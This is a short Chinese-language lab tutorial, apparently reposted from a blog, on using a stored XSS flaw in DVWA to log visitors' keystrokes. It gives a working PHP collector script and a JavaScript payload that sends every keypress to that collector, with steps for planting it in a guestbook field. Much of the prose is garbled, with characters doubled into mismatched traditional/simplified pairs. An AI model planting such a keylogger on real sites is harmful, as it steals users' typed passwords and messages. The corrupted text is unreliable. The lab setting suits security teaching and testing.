實(shí)驗(yàn)環(huán)境：DVWA

實(shí)驗(yàn)原理：網(wǎng)頁(yè)被植入xss腳本，普通用戶訪問(wèn)此網(wǎng)頁(yè)時(shí)，該用戶在當(dāng)前頁(yè)面上所有的鍵盤(pán)按鍵都會(huì)被記錄下來(lái)，并且發(fā)送到遠(yuǎn)端服務(wù)器

實(shí)驗(yàn)步驟：

一、在服務(wù)器創(chuàng)建一個(gè)keylog.php文件獲取鍵盤(pán)記錄，并將記錄寫(xiě)入key.txt中。

php代碼如下：

<?php $file=fopen("key.txt","a"); if(isset($_REQUEST['key'])){$key=$_REQUEST['key'];fputs($file,$key); } ?>

二、編寫(xiě)js腳本

<script>window.onkeydown=function(ev){xhr =new XMLHttpRequest();xhr.open('POST','http://localhost/xss/keylog/keylog.php',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('key='+String.fromCharCode(ev.keyCode)); } </script>

三、打開(kāi)低級(jí)別DVWA，選擇儲(chǔ)存xss模塊，將js腳本寫(xiě)入留言框，執(zhí)行代碼

四、可看到當(dāng)在輸入框輸入內(nèi)容時(shí)，key.txt已經(jīng)將鍵盤(pán)記錄下來(lái)了

總結(jié)

以上是生活随笔為你收集整理的XSS漏洞利用——键盘记录的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。